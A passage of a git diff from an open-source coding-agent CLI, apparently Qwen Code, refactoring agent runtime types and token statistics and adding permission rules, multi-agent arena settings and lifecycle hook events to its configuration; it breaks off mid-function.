the run loop to finish (used by InProcessBackend). + */ + async waitForCompletion(): Promise { + if (this.executionPromise) { + await this.executionPromise; + } + } + + // ─── Private Helpers ─────────────────────────────────────── + + /** + * Settle status after the run loop empties. + * On success → IDLE (agent stays alive for follow-up messages). + * On error → FAILED (terminal). + */ + private settleRoundStatus(): void { + if (this.lastRoundError && !this.roundCancelledByUser) { + this.setStatus(AgentStatus.FAILED); + } else { + this.setStatus(AgentStatus.IDLE); + } + } + + private setStatus(newStatus: AgentStatus): void { + const previousStatus = this.status; + if (previousStatus === newStatus) return; + + this.status = newStatus; + + this.core.eventEmitter?.emit(AgentEventType.STATUS_CHANGE, { + agentId: this.config.agentId, + previousStatus, + newStatus, + roundCancelledByUser: this.roundCancelledByUser || undefined, + timestamp: Date.now(), + }); + } + + private addMessage( + role: AgentMessage['role'], + content: string, + options?: { thought?: boolean; metadata?: Record }, + ): void { + const message: AgentMessage = { + role, + content, + timestamp: Date.now(), + }; + if (options?.thought) { + message.thought = true; + } + if (options?.metadata) { + message.metadata = options.metadata; + } + this.messages.push(message); + } + + private setupEventListeners(): void { + const emitter = this.core.eventEmitter; + if (!emitter) return; + + emitter.on(AgentEventType.ROUND_TEXT, (event: AgentRoundTextEvent) => { + if (event.thoughtText) { + this.addMessage('assistant', event.thoughtText, { thought: true }); + } + if (event.text) { + this.addMessage('assistant', event.text); + } + }); + + emitter.on(AgentEventType.TOOL_CALL, (event: AgentToolCallEvent) => { + this.addMessage('tool_call', `Tool call: ${event.name}`, { + metadata: { + callId: event.callId, + toolName: event.name, + args: event.args, + description: event.description, + renderOutputAsMarkdown: event.isOutputMarkdown, + round: event.round, + }, + }); + }); + + emitter.on( + AgentEventType.TOOL_OUTPUT_UPDATE, + (event: AgentToolOutputUpdateEvent) => { + this.liveOutputs.set(event.callId, event.outputChunk); + if (event.pid !== undefined) { + this.shellPids.set(event.callId, event.pid); + } + }, + ); + + emitter.on(AgentEventType.TOOL_RESULT, (event: AgentToolResultEvent) => { + this.liveOutputs.delete(event.callId); + this.shellPids.delete(event.callId); + this.pendingApprovals.delete(event.callId); + + const statusText = event.success ? 'succeeded' : 'failed'; + const summary = event.error + ? `Tool ${event.name} ${statusText}: ${event.error}` + : `Tool ${event.name} ${statusText}`; + this.addMessage('tool_result', summary, { + metadata: { + callId: event.callId, + toolName: event.name, + success: event.success, + resultDisplay: event.resultDisplay, + outputFile: event.outputFile, + round: event.round, + }, + }); + }); + + emitter.on( + AgentEventType.TOOL_WAITING_APPROVAL, + (event: AgentApprovalRequestEvent) => { + const fullDetails = { + ...event.confirmationDetails, + onConfirm: async ( + outcome: Parameters[0], + payload?: Parameters[1], + ) => { + this.pendingApprovals.delete(event.callId); + // Nudge the UI to re-render so the tool transitions visually + // from Confirming → Executing without waiting for the first + // real TOOL_OUTPUT_UPDATE from the tool's execution. + this.core.eventEmitter?.emit(AgentEventType.TOOL_OUTPUT_UPDATE, { + subagentId: this.core.subagentId, + round: event.round, + callId: event.callId, + outputChunk: '', + timestamp: Date.now(), + } as AgentToolOutputUpdateEvent); + await event.respond(outcome, payload); + // When the user denies a tool, cancel the round immediately + // so the agent doesn't waste a turn "acknowledging" the denial. + if (outcome === ToolConfirmationOutcome.Cancel) { + this.cancelCurrentRound(); + } + }, + } as ToolCallConfirmationDetails; + + this.pendingApprovals.set(event.callId, fullDetails); + }, + ); + } +} + +/** + * Map a non-GOAL terminate mode to a visible status message for the UI, + * or return null to suppress the message entirely. + * + * CANCELLED is suppressed here because cancelCurrentRound() already emits + * its own warning. SHUTDOWN is suppressed as a normal lifecycle end. + */ +function terminateModeMessage( + mode: AgentTerminateMode, +): { text: string; level: 'info' | 'warning' | 'error' } | null { + switch (mode) { + case AgentTerminateMode.MAX_TURNS: + return { + text: 'Agent stopped: maximum turns reached.', + level: 'warning', + }; + case AgentTerminateMode.TIMEOUT: + return { text: 'Agent stopped: time limit reached.', level: 'warning' }; + case AgentTerminateMode.ERROR: + return { text: 'Agent stopped due to an error.', level: 'error' }; + case AgentTerminateMode.CANCELLED: + case AgentTerminateMode.SHUTDOWN: + return null; + default: + return null; + } +} diff --git a/packages/core/src/subagents/subagent-statistics.test.ts b/packages/core/src/agents/runtime/agent-statistics.test.ts similarity index 92% rename from packages/core/src/subagents/subagent-statistics.test.ts rename to packages/core/src/agents/runtime/agent-statistics.test.ts index 39ba70aa4..ec9f6e990 100644 --- a/packages/core/src/subagents/subagent-statistics.test.ts +++ b/packages/core/src/agents/runtime/agent-statistics.test.ts @@ -5,14 +5,14 @@ */ import { describe, it, expect, beforeEach } from 'vitest'; -import { SubagentStatistics } from './subagent-statistics.js'; +import { AgentStatistics } from './agent-statistics.js'; -describe('SubagentStatistics', () => { - let stats: SubagentStatistics; +describe('AgentStatistics', () => { + let stats: AgentStatistics; const baseTime = 1000000000000; // Fixed timestamp for consistent testing beforeEach(() => { - stats = new SubagentStatistics(); + stats = new AgentStatistics(); }); describe('basic statistics tracking', () => { @@ -57,7 +57,23 @@ describe('SubagentStatistics', () => { const summary = stats.getSummary(); expect(summary.thoughtTokens).toBe(10); expect(summary.cachedTokens).toBe(5); - expect(summary.totalTokens).toBe(165); // 100 + 50 + 10 + 5 + // cachedTokens is a subset of inputTokens, not additive + expect(summary.totalTokens).toBe(160); // 100 + 50 + 10 + }); + + it('should use API-provided totalTokenCount when available', () => { + stats.recordTokens(100, 50, 10, 5, 170); + + const summary = stats.getSummary(); + expect(summary.totalTokens).toBe(170); + }); + + it('should accumulate API totalTokenCount across rounds', () => { + stats.recordTokens(100, 50, 0, 0, 150); + stats.recordTokens(200, 80, 0, 0, 280); + + const summary = stats.getSummary(); + expect(summary.totalTokens).toBe(430); // 150 + 280 }); }); @@ -109,7 +125,7 @@ describe('SubagentStatistics', () => { expect(result).toContain('📋 Task Completed: Test task'); expect(result).toContain('🔧 Tool Usage: 1 calls, 100.0% success'); expect(result).toContain('⏱️ Duration: 5.0s | 🔁 Rounds: 2'); - expect(result).toContain('🔢 Tokens: 1,530 (in 1000, out 500)'); + expect(result).toContain('🔢 Tokens: 1,520 (in 1000, out 500)'); }); it('should handle zero tool calls', () => { diff --git a/packages/core/src/subagents/subagent-statistics.ts b/packages/core/src/agents/runtime/agent-statistics.ts similarity index 95% rename from packages/core/src/subagents/subagent-statistics.ts rename to packages/core/src/agents/runtime/agent-statistics.ts index 72308c633..55c16f529 100644 --- a/packages/core/src/subagents/subagent-statistics.ts +++ b/packages/core/src/agents/runtime/agent-statistics.ts @@ -14,7 +14,7 @@ export interface ToolUsageStats { averageDurationMs: number; } -export interface SubagentStatsSummary { +export interface AgentStatsSummary { rounds: number; totalDurationMs: number; totalToolCalls: number; @@ -26,11 +26,10 @@ export interface SubagentStatsSummary { thoughtTokens: number; cachedTokens: number; totalTokens: number; - estimatedCost: number; toolUsage: ToolUsageStats[]; } -export class SubagentStatistics { +export class AgentStatistics { private startTimeMs = 0; private rounds = 0; private totalToolCalls = 0; @@ -40,6 +39,7 @@ export class SubagentStatistics { private outputTokens = 0; private thoughtTokens = 0; private cachedTokens = 0; + private apiTotalTokens = 0; private toolUsage = new Map(); start(now = Date.now()) { @@ -83,14 +83,16 @@ export class SubagentStatistics { output: number, thought: number = 0, cached: number = 0, + total: number = 0, ) { this.inputTokens += Math.max(0, input || 0); this.outputTokens += Math.max(0, output || 0); this.thoughtTokens += Math.max(0, thought || 0); this.cachedTokens += Math.max(0, cached || 0); + this.apiTotalTokens += Math.max(0, total || 0); } - getSummary(now = Date.now()): SubagentStatsSummary { + getSummary(now = Date.now()): AgentStatsSummary { const totalDurationMs = this.startTimeMs ? now - this.startTimeMs : 0; const totalToolCalls = this.totalToolCalls; const successRate = @@ -98,11 +100,9 @@ export class SubagentStatistics { ? (this.successfulToolCalls / totalToolCalls) * 100 : 0; const totalTokens = - this.inputTokens + - this.outputTokens + - this.thoughtTokens + - this.cachedTokens; - const estimatedCost = this.inputTokens * 3e-5 + this.outputTokens * 6e-5; + this.apiTotalTokens > 0 + ? this.apiTotalTokens + : this.inputTokens + this.outputTokens + this.thoughtTokens; return { rounds: this.rounds, totalDurationMs, @@ -115,7 +115,6 @@ export class SubagentStatistics { thoughtTokens: this.thoughtTokens, cachedTokens: this.cachedTokens, totalTokens, - estimatedCost, toolUsage: Array.from(this.toolUsage.values()), }; } @@ -217,7 +216,7 @@ export class SubagentStatistics { return `${h}h ${m}m`; } - private generatePerformanceTips(stats: SubagentStatsSummary): string[] { + private generatePerformanceTips(stats: AgentStatsSummary): string[] { const tips: string[] = []; const totalCalls = stats.totalToolCalls; const sr = diff --git a/packages/core/src/agents/runtime/agent-types.ts b/packages/core/src/agents/runtime/agent-types.ts new file mode 100644 index 000000000..d1204098a --- /dev/null +++ b/packages/core/src/agents/runtime/agent-types.ts @@ -0,0 +1,198 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Agent runtime types. + * + * Contains the canonical definitions for agent configuration (prompt, model, + * run, tool), termination modes, and interactive agent types. + */ + +import type { Content, FunctionDeclaration } from '@google/genai'; + +// ─── Agent Configuration ───────────────────────────────────── + +/** + * Configures the initial prompt for an agent. + */ +export interface PromptConfig { + /** + * A single system prompt string that defines the agent's persona and instructions. + * Note: You should use either `systemPrompt` or `initialMessages`, but not both. + */ + systemPrompt?: string; + + /** + * An array of user/model content pairs to seed the chat history for few-shot prompting. + * Note: You should use either `systemPrompt` or `initialMessages`, but not both. + */ + initialMessages?: Content[]; +} + +/** + * Configures the generative model parameters for an agent. + */ +export interface ModelConfig { + /** + * The name or identifier of the model to be used (e.g., 'qwen3-coder-plus'). + * + * TODO: In the future, this needs to support 'auto' or some other string to support routing use cases. + */ + model?: string; + /** The temperature for the model's sampling process. */ + temp?: number; + /** The top-p value for nucleus sampling. */ + top_p?: number; +} + +/** + * Configures the execution environment and constraints for an agent. + * + * TODO: Consider adding max_tokens as a form of budgeting. + */ +export interface RunConfig { + /** The maximum execution time for the agent in minutes. */ + max_time_minutes?: number; + /** + * The maximum number of conversational turns (a user message + model response) + * before the execution is terminated. Helps prevent infinite loops. + */ + max_turns?: number; +} + +/** + * Configures the tools available to an agent during its execution. + */ +export interface ToolConfig { + /** + * A list of tool names (from the tool registry) or full function declarations + * that the agent is permitted to use. + */ + tools: Array; +} + +/** + * Describes the possible termination modes for an agent. + * This enum provides a clear indication of why an agent's execution ended. + */ +export enum AgentTerminateMode { + /** The agent's execution terminated due to an unrecoverable error. */ + ERROR = 'ERROR', + /** The agent's execution terminated because it exceeded the maximum allowed working time. */ + TIMEOUT = 'TIMEOUT', + /** The agent's execution successfully completed all its defined goals. */ + GOAL = 'GOAL', + /** The agent's execution terminated because it exceeded the maximum number of turns. */ + MAX_TURNS = 'MAX_TURNS', + /** The agent's execution was cancelled via an abort signal. */ + CANCELLED = 'CANCELLED', + /** The agent was gracefully shut down (e.g., arena/team session ended). */ + SHUTDOWN = 'SHUTDOWN', +} + +// ─── Agent Status ──────────────────────────────────────────── + +/** + * Canonical lifecycle status for any agent (headless, interactive, arena). + * + * State machine: + * INITIALIZING → RUNNING → IDLE ⇄ RUNNING → … → COMPLETED / FAILED / CANCELLED + * + * - INITIALIZING: Setting up (creating chat, loading tools). + * - RUNNING: Actively processing (model thinking / tool execution). + * - IDLE: Finished current work, waiting — can accept new messages. + * - COMPLETED: Finished for good (explicit shutdown). No further interaction. + * - FAILED: Finished with error (API failure, process crash, etc.). + * - CANCELLED: Cancelled by user or system. + */ +export enum AgentStatus { + INITIALIZING = 'initializing', + RUNNING = 'running', + IDLE = 'idle', + COMPLETED = 'completed', + FAILED = 'failed', + CANCELLED = 'cancelled', +} + +/** True for COMPLETED, FAILED, CANCELLED — agent is done for good. */ +export const isTerminalStatus = (s: AgentStatus): boolean => + s === AgentStatus.COMPLETED || + s === AgentStatus.FAILED || + s === AgentStatus.CANCELLED; + +/** True for IDLE or COMPLETED — agent finished its work successfully. */ +export const isSuccessStatus = (s: AgentStatus): boolean => + s === AgentStatus.IDLE || s === AgentStatus.COMPLETED; + +/** True for terminal statuses OR IDLE — agent has settled (not actively working). */ +export const isSettledStatus = (s: AgentStatus): boolean => + s === AgentStatus.IDLE || isTerminalStatus(s); + +/** + * Lightweight configuration for an AgentInteractive instance. + * Carries only interactive-specific parameters; the heavy runtime + * configs (prompt, model, run, tools) live on AgentCore. + */ +export interface AgentInteractiveConfig { + /** Unique identifier for this agent. */ + agentId: string; + /** Human-readable name for display. */ + agentName: string; + /** Optional initial task to start working on immediately. */ + initialTask?: string; + /** Max model round-trips per enqueued message (default: unlimited). */ + maxTurnsPerMessage?: number; + /** Max wall-clock minutes per enqueued message (default: unlimited). */ + maxTimeMinutesPerMessage?: number; + /** + * Optional conversation history from a parent session to seed the + * agent's chat with prior context. + */ + chatHistory?: Content[]; +} + +/** + * A message exchanged with or produced by an interactive agent. + * + * This is a UI-oriented data model (not the Gemini API Content type). + * AgentInteractive is the sole writer; the UI reads via getMessages(). + */ +export interface AgentMessage { + /** Discriminator for the message kind. */ + role: 'user' | 'assistant' | 'tool_call' | 'tool_result' | 'info'; + /** The text content of the message. */ + content: string; + /** When the message was created (ms since epoch). */ + timestamp: number; + /** + * Whether this assistant message contains thinking/reasoning content. + * Mirrors AgentStreamTextEvent.thought. Only meaningful when role is 'assistant'. + */ + thought?: boolean; + /** + * Optional metadata. + * + * For role='info': metadata.level?: 'info' | 'warning' | 'success' | 'error' + * Controls which status message component is rendered. Defaults to 'info'. + * For role='tool_call': callId, toolName, args, description, renderOutputAsMarkdown, round + * For role='tool_result': callId, toolName, success, resultDisplay, outputFile, round + * For role='assistant' with error: error=true + */ + metadata?: Record; +} + +/** + * Snapshot of in-progress streaming state for UI mid-switch handoff. + * Returned by AgentInteractive.getInProgressStream(). + */ +export interface InProgressStreamState { + /** Accumulated non-thought text so far in the current round. */ + text: string; + /** Accumulated thinking text so far in the current round. */ + thinking: string; + /** The reasoning-loop round number being streamed. */ + round: number; +} diff --git a/packages/core/src/agents/runtime/index.ts b/packages/core/src/agents/runtime/index.ts new file mode 100644 index 000000000..93ef0e5a3 --- /dev/null +++ b/packages/core/src/agents/runtime/index.ts @@ -0,0 +1,17 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Runtime barrel — re-exports agent execution primitives. + */ + +export * from './agent-types.js'; +export * from './agent-core.js'; +export * from './agent-headless.js'; +export * from './agent-interactive.js'; +export * from './agent-events.js'; +export * from './agent-statistics.js'; +export { AsyncMessageQueue } from '../../utils/asyncMessageQueue.js'; diff --git a/packages/core/src/config/config.test.ts b/packages/core/src/config/config.test.ts index 828ef9c3e..5b1e62fb5 100644 --- a/packages/core/src/config/config.test.ts +++ b/packages/core/src/config/config.test.ts @@ -36,6 +36,8 @@ import { RipGrepTool } from '../tools/ripGrep.js'; import { logRipgrepFallback } from '../telemetry/loggers.js'; import { RipgrepFallbackEvent } from '../telemetry/types.js'; import { ToolRegistry } from '../tools/tool-registry.js'; +import { fireNotificationHook } from '../core/toolHookTriggers.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; function createToolMock(toolName: string) { const ToolMock = vi.fn(); @@ -195,6 +197,10 @@ vi.mock('../ide/ide-client.js', () => ({ import { BaseLlmClient } from '../core/baseLlmClient.js'; vi.mock('../core/baseLlmClient.js'); +// Mock fireNotificationHook from toolHookTriggers +vi.mock('../core/toolHookTriggers.js', () => ({ + fireNotificationHook: vi.fn().mockResolvedValue({}), +})); describe('Server Config (config.ts)', () => { const MODEL = 'qwen3-coder-plus'; @@ -248,6 +254,26 @@ describe('Server Config (config.ts)', () => { ); }); + it('should store a system prompt override', () => { + const config = new Config({ + ...baseParams, + systemPrompt: 'You are a custom system prompt.', + }); + + expect(config.getSystemPrompt()).toBe('You are a custom system prompt.'); + expect(config.getAppendSystemPrompt()).toBeUndefined(); + }); + + it('should store an appended system prompt', () => { + const config = new Config({ + ...baseParams, + appendSystemPrompt: 'Be extra concise.', + }); + + expect(config.getAppendSystemPrompt()).toBe('Be extra concise.'); + expect(config.getSystemPrompt()).toBeUndefined(); + }); + describe('initialize', () => { it('should throw an error if checkpointing is enabled and GitService fails', async () => { const gitError = new Error('Git is not installed'); @@ -317,6 +343,64 @@ describe('Server Config (config.ts)', () => { expect(GeminiClient).toHaveBeenCalledWith(config); }); + it('should fire auth_success notification hook when hooks are enabled', async () => { + const mockMessageBus = { request: vi.fn() }; + const config = new Config({ + ...baseParams, + enableHooks: true, + }); + // Set messageBus using the setter + config.setMessageBus(mockMessageBus as unknown as MessageBus); + + const authType = AuthType.USE_GEMINI; + const mockContentConfig = { + apiKey: 'test-key', + model: 'qwen3-coder-plus', + authType, + }; + + vi.mocked(resolveContentGeneratorConfigWithSources).mockReturnValue({ + config: mockContentConfig as ContentGeneratorConfig, + sources: {}, + }); + + await config.refreshAuth(authType); + + // Verify that fireNotificationHook was called with correct parameters + expect(fireNotificationHook).toHaveBeenCalledWith( + mockMessageBus, + `Successfully authenticated with ${authType}`, + 'auth_success', + 'Authentication successful', + ); + }); + + it('should not fire notification hook when hooks are disabled', async () => { + const config = new Config({ + ...baseParams, + enableHooks: false, + }); + const authType = AuthType.USE_GEMINI; + const mockContentConfig = { + apiKey: 'test-key', + model: 'qwen3-coder-plus', + authType, + }; + + vi.mocked(resolveContentGeneratorConfigWithSources).mockReturnValue({ + config: mockContentConfig as ContentGeneratorConfig, + sources: {}, + }); + + // Clear any previous calls + vi.mocked(fireNotificationHook).mockClear(); + + await config.refreshAuth(authType); + + // Verify that fireNotificationHook was not called + expect(fireNotificationHook).not.toHaveBeenCalled(); + }); + it('should not strip thoughts when switching from Vertex to GenAI', async () => { const config = new Config(baseParams); @@ -1047,10 +1131,10 @@ describe('Server Config (config.ts)', () => { expect(config.getTruncateToolOutputThreshold()).toBe(50000); }); - it('should return infinity when truncation is disabled', () => { + it('should return infinity when threshold is zero or negative', () => { const customParams = { ...baseParams, - enableToolOutputTruncation: false, + truncateToolOutputThreshold: 0, }; const config = new Config(customParams); expect(config.getTruncateToolOutputThreshold()).toBe( diff --git a/packages/core/src/config/config.ts b/packages/core/src/config/config.ts index 3663beb8f..4cf4d9a3e 100644 --- a/packages/core/src/config/config.ts +++ b/packages/core/src/config/config.ts @@ -21,6 +21,8 @@ import type { ContentGeneratorConfigSources } from '../core/contentGenerator.js' import type { MCPOAuthConfig } from '../mcp/oauth-provider.js'; import type { ShellExecutionConfig } from '../services/shellExecutionService.js'; import type { AnyToolInvocation } from '../tools/tools.js'; +import type { ArenaManager } from '../agents/arena/ArenaManager.js'; +import { ArenaAgentClient } from '../agents/arena/ArenaAgentClient.js'; // Core import { BaseLlmClient } from '../core/baseLlmClient.js'; @@ -37,7 +39,6 @@ import { type FileSystemService, StandardFileSystemService, type FileEncodingType, - FileEncoding, } from '../services/fileSystemService.js'; import { GitService } from '../services/gitService.js'; @@ -69,6 +70,7 @@ import { ideContextStore } from '../ide/ideContext.js'; import { InputFormat, OutputFormat } from '../output/types.js'; import { PromptRegistry } from '../prompts/prompt-registry.js'; import { SkillManager } from '../skills/skill-manager.js'; +import { PermissionManager } from '../permissions/permission-manager.js'; import { SubagentManager } from '../subagents/subagent-manager.js'; import type { SubagentConfig } from '../subagents/types.js'; import { @@ -92,13 +94,19 @@ import { type HookExecutionRequest, type HookExecutionResponse, } from '../confirmation-bus/types.js'; +import { + PermissionMode, + NotificationType, + type PermissionSuggestion, +} from '../hooks/types.js'; +import { fireNotificationHook } from '../core/toolHookTriggers.js'; // Utils import { shouldAttemptBrowserLaunch } from '../utils/browser.js'; import { FileExclusions } from '../utils/ignorePatterns.js'; import { shouldDefaultToNodePty } from '../utils/shell-utils.js'; import { WorkspaceContext } from '../utils/workspaceContext.js'; -import { isToolEnabled, type ToolName } from '../utils/tool-utils.js'; +import { type ToolName } from '../utils/tool-utils.js'; import { getErrorMessage } from '../utils/errors.js'; // Local config modules @@ -195,10 +203,6 @@ export interface ChatCompressionSettings { contextPercentageThreshold?: number; } -export interface SummarizeToolOutputSettings { - tokenBudget?: number; -} - export interface TelemetrySettings { enabled?: boolean; target?: TelemetryTarget; @@ -289,6 +293,26 @@ export interface SandboxConfig { image: string; } +/** + * Settings shared across multi-agent collaboration features + * (Arena, Team, Swarm). + */ +export interface AgentsCollabSettings { + /** Display mode for multi-agent sessions ('in-process' | 'tmux' | 'iterm2') */ + displayMode?: string; + /** Arena-specific settings */ + arena?: { + /** Custom base directory for Arena worktrees (default: ~/.qwen/arena) */ + worktreeBaseDir?: string; + /** Preserve worktrees and state files after session ends */ + preserveArtifacts?: boolean; + /** Maximum rounds (turns) per agent. No limit if unset. */ + maxRoundsPerAgent?: number; + /** Total timeout in seconds for the Arena session. No limit if unset. */ + timeoutSeconds?: number; + }; +} + export interface ConfigParameters { sessionId?: string; sessionData?: ResumedSessionData; @@ -298,9 +322,17 @@ export interface ConfigParameters { debugMode: boolean; includePartialMessages?: boolean; question?: string; + systemPrompt?: string; + appendSystemPrompt?: string; coreTools?: string[]; allowedTools?: string[]; excludeTools?: string[]; + /** Merged permission rules from all sources (settings + CLI args). */ + permissions?: { + allow?: string[]; + ask?: string[]; + deny?: string[]; + }; toolDiscoveryCommand?: string; toolCallCommand?: string; mcpServerCommand?: string; @@ -339,7 +371,6 @@ export interface ConfigParameters { allowedMcpServers?: string[]; excludedMcpServers?: string[]; noBrowser?: boolean; - summarizeToolOutput?: Record; folderTrustFeature?: boolean; folderTrust?: boolean; ideMode?: boolean; @@ -375,7 +406,6 @@ export interface ConfigParameters { skipLoopDetection?: boolean; truncateToolOutputThreshold?: number; truncateToolOutputLines?: number; - enableToolOutputTruncation?: boolean; eventEmitter?: EventEmitter; output?: OutputSettings; inputFormat?: InputFormat; @@ -386,6 +416,8 @@ export interface ConfigParameters { channel?: string; /** Model providers configuration grouped by authType */ modelProvidersConfig?: ModelProvidersConfig; + /** Multi-agent collaboration settings (Arena, Team, Swarm) */ + agents?: AgentsCollabSettings; /** Enable hook system for lifecycle events */ enableHooks?: boolean; /** Hooks configuration from settings */ @@ -394,6 +426,20 @@ export interface ConfigParameters { hooksConfig?: Record; /** Warnings generated during configuration resolution */ warnings?: string[]; + /** + * Callback for persisting a permission rule to settings. + * Injected by the CLI layer; core uses this to write allow/ask/deny rules + * to project or user settings when the user clicks "Always Allow". + * + * @param scope - 'project' for workspace settings, 'user' for user settings. + * @param ruleType - 'allow' | 'ask' | 'deny'. + * @param rule - The raw rule string, e.g. "Bash(git *)" or "Edit". + */ + onPersistPermissionRule?: ( + scope: 'project' | 'user', + ruleType: 'allow' | 'ask' | 'deny', + rule: string, + ) => Promise; } function normalizeConfigOutputFormat( @@ -435,6 +481,7 @@ export class Config { private subagentManager!: SubagentManager; private extensionManager!: ExtensionManager; private skillManager: SkillManager | null = null; + private permissionManager: PermissionManager | null = null; private fileSystemService: FileSystemService; private contentGeneratorConfig!: ContentGeneratorConfig; private contentGeneratorConfigSources: ContentGeneratorConfigSources = {}; @@ -451,9 +498,14 @@ export class Config { private readonly outputFormat: OutputFormat; private readonly includePartialMessages: boolean; private readonly question: string | undefined; + private readonly systemPrompt: string | undefined; + private readonly appendSystemPrompt: string | undefined; private readonly coreTools: string[] | undefined; private readonly allowedTools: string[] | undefined; private readonly excludeTools: string[] | undefined; + private readonly permissionsAllow: string[]; + private readonly permissionsAsk: string[]; + private readonly permissionsDeny: string[]; private readonly toolDiscoveryCommand: string | undefined; private readonly toolCallCommand: string | undefined; private readonly mcpServerCommand: string | undefined; @@ -498,9 +550,6 @@ export class Config { private readonly listExtensions: boolean; private readonly overrideExtensions?: string[]; - private readonly summarizeToolOutput: - | Record - | undefined; private readonly cliVersion?: string; private readonly experimentalZedIntegration: boolean = false; private readonly chatRecordingEnabled: boolean; @@ -522,18 +571,28 @@ export class Config { private readonly shouldUseNodePtyShell: boolean; private readonly skipNextSpeakerCheck: boolean; private shellExecutionConfig: ShellExecutionConfig; + private arenaManager: ArenaManager | null = null; + private arenaManagerChangeCallback: + | ((manager: ArenaManager | null) => void) + | null = null; + private readonly arenaAgentClient: ArenaAgentClient | null; + private readonly agentsSettings: AgentsCollabSettings; private readonly skipLoopDetection: boolean; private readonly skipStartupContext: boolean; private readonly warnings: string[]; + private readonly onPersistPermissionRuleCallback?: ( + scope: 'project' | 'user', + ruleType: 'allow' | 'ask' | 'deny', + rule: string, + ) => Promise; private initialized: boolean = false; readonly storage: Storage; private readonly fileExclusions: FileExclusions; private readonly truncateToolOutputThreshold: number; private readonly truncateToolOutputLines: number; - private readonly enableToolOutputTruncation: boolean; private readonly eventEmitter?: EventEmitter; private readonly channel: string | undefined; - private readonly defaultFileEncoding: FileEncodingType; + private readonly defaultFileEncoding: FileEncodingType | undefined; private readonly enableHooks: boolean; private readonly hooks?: Record; private readonly hooksConfig?: Record; @@ -561,9 +620,14 @@ export class Config { this.outputFormat = normalizedOutputFormat ?? OutputFormat.TEXT; this.includePartialMessages = params.includePartialMessages ?? false; this.question = params.question; + this.systemPrompt = params.systemPrompt; + this.appendSystemPrompt = params.appendSystemPrompt; this.coreTools = params.coreTools; this.allowedTools = params.allowedTools; this.excludeTools = params.excludeTools; + this.permissionsAllow = params.permissions?.allow || []; + this.permissionsAsk = params.permissions?.ask || []; + this.permissionsDeny = params.permissions?.deny || []; this.toolDiscoveryCommand = params.toolDiscoveryCommand; this.toolCallCommand = params.toolCallCommand; this.mcpServerCommand = params.mcpServerCommand; @@ -614,7 +678,6 @@ export class Config { this.listExtensions = params.listExtensions ?? false; this.overrideExtensions = params.overrideExtensions; this.noBrowser = params.noBrowser ?? false; - this.summarizeToolOutput = params.summarizeToolOutput; this.folderTrustFeature = params.folderTrustFeature ?? false; this.folderTrust = params.folderTrust ?? false; this.ideMode = params.ideMode ?? false; @@ -632,6 +695,7 @@ export class Config { this.skipLoopDetection = params.skipLoopDetection ?? false; this.skipStartupContext = params.skipStartupContext ?? false; this.warnings = params.warnings ?? []; + this.onPersistPermissionRuleCallback = params.onPersistPermissionRule; // Web search this.webSearch = params.webSearch; @@ -651,13 +715,14 @@ export class Config { DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD; this.truncateToolOutputLines = params.truncateToolOutputLines ?? DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES; - this.enableToolOutputTruncation = params.enableToolOutputTruncation ?? true; this.channel = params.channel; - this.defaultFileEncoding = params.defaultFileEncoding ?? FileEncoding.UTF8; + this.defaultFileEncoding = params.defaultFileEncoding; this.storage = new Storage(this.targetDir); this.inputFormat = params.inputFormat ?? InputFormat.TEXT; this.fileExclusions = new FileExclusions(this); this.eventEmitter = params.eventEmitter; + this.arenaAgentClient = ArenaAgentClient.create(); + this.agentsSettings = params.agents ?? {}; if (params.contextFileName) { setGeminiMdFilename(params.contextFileName); } @@ -760,6 +825,73 @@ export class Config { (input['last_assistant_message'] as string) || '', ); break; + case 'PreToolUse': { + result = await hookSystem.firePreToolUseEvent( + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['tool_use_id'] as string) || '', + (input['permission_mode'] as PermissionMode | undefined) ?? + PermissionMode.Default, + ); + break; + } + case 'PostToolUse': + result = await hookSystem.firePostToolUseEvent( + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['tool_response'] as Record) || {}, + (input['tool_use_id'] as string) || '', + (input['permission_mode'] as PermissionMode) || 'default', + ); + break; + case 'PostToolUseFailure': + result = await hookSystem.firePostToolUseFailureEvent( + (input['tool_use_id'] as string) || '', + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['error'] as string) || '', + input['is_interrupt'] as boolean | undefined, + (input['permission_mode'] as PermissionMode) || 'default', + ); + break; + case 'Notification': + result = await hookSystem.fireNotificationEvent( + (input['message'] as string) || '', + (input['notification_type'] as NotificationType) || + 'permission_prompt', + (input['title'] as string) || undefined, + ); + break; + case 'PermissionRequest': + result = await hookSystem.firePermissionRequestEvent( + (input['tool_name'] as string) || '', + (input['tool_input'] as Record) || {}, + (input['permission_mode'] as PermissionMode) || + PermissionMode.Default, + (input['permission_suggestions'] as + | PermissionSuggestion[] + | undefined) || undefined, + ); + break; + case 'SubagentStart': + result = await hookSystem.fireSubagentStartEvent( + (input['agent_id'] as string) || '', + (input['agent_type'] as string) || '', + (input['permission_mode'] as PermissionMode) || + PermissionMode.Default, + ); + break; + case 'SubagentStop': + result = await hookSystem.fireSubagentStopEvent( + (input['agent_id'] as string) || '', + (input['agent_type'] as string) || '', + (input['agent_transcript_path'] as string) || '', + (input['last_assistant_message'] as string) || '', + (input['stop_hook_active'] as boolean) || false, + (input['permission_mode'] as PermissionMode) || + PermissionMode.Default, + ); + break; default: this.debugLogger.warn( `Unknown hook event: ${request.eventName}`, @@ -787,6 +919,8 @@ export class Config { ); this.debugLogger.debug('MessageBus initialized with hook subscription'); + } else { + this.debugLogger.debug('Hook system disabled, skipping initialization'); } this.subagentManager = new SubagentManager(this); @@ -794,6 +928,10 @@ export class Config { await this.skillManager.startWatching(); this.debugLogger.debug('Skill manager initialized'); + this.permissionManager = new PermissionManager(this); + this.permissionManager.initialize(); + this.debugLogger.debug('Permission manager initialized'); + // Load session subagents if they were provided before initialization if (this.sessionSubagents.length > 0) { this.subagentManager.loadSessionSubagents(this.sessionSubagents); @@ -910,6 +1048,21 @@ export class Config { // Initialize BaseLlmClient now that the ContentGenerator is available this.baseLlmClient = new BaseLlmClient(this.contentGenerator, this); + + // Fire auth_success notification hook (supports both interactive & non-interactive) + const messageBus = this.getMessageBus(); + const hooksEnabled = this.getEnableHooks(); + if (hooksEnabled && messageBus) { + fireNotificationHook( 